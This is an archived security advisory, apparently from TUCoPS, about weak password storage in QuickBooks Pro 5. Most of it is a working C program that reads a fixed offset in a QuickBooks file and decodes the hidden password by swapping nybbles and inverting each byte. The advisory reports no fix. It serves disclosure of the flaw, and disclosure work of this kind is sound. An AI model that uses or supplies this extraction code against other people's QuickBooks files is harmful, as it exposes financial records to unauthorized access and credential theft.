Vulnerability
QuickBooks Pro
Affected
Systems running QuickBooks Pro 5 (at least)
Description
Lucky Green posted following (found by Eric Blossom?). It's a
simple hack that extracts the not very cleverly hidden password
stored in QuickBooks. This was only tested it with QuickBooks Pro
version 5.0.
/* -*-C-*-
****************************************************************************
***
*
* File: get-qb-pw.c
* RCS: $Id: $
* Description: get the "quick books pro" password
* Author: Eric Blossom
* Created: Tue Aug 18 14:09:30 1998
* Modified: Tue Aug 18 17:39:22 1998 (eric) eb@starium.com
* Language: C
* Package: N/A
* Status: Experimental (Do Not Distribute)
*
****************************************************************************
***
*/
#include <stdio.h>
main (int argc, char **argv)
{
FILE *fp;
int i;
unsigned char raw[10];
if (argc != 2){
fprintf (stderr, "usage: get-qb-pw filename\n");
exit (1);
}
if ((fp = fopen (argv[1], "rb")) == 0){
perror (argv[0]);
exit (1);
}
if (fseek (fp, 7635, SEEK_SET) != 0){
perror ("fseek failed");
exit (1);
}
if (fread (raw, 1, 10, fp) != 10){
perror ("fread failed");
exit (1);
}
for (i = 9; i >= 0; i--){
int t;
if (raw[i] == 0)
continue;
t = ((raw[i] & 0xf) << 4) | ((raw[i] >> 4) & 0xf); /* swap nybbles */
putchar (-t + 255);
}
putchar ('\n');
}
Solution
Nothing yet.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
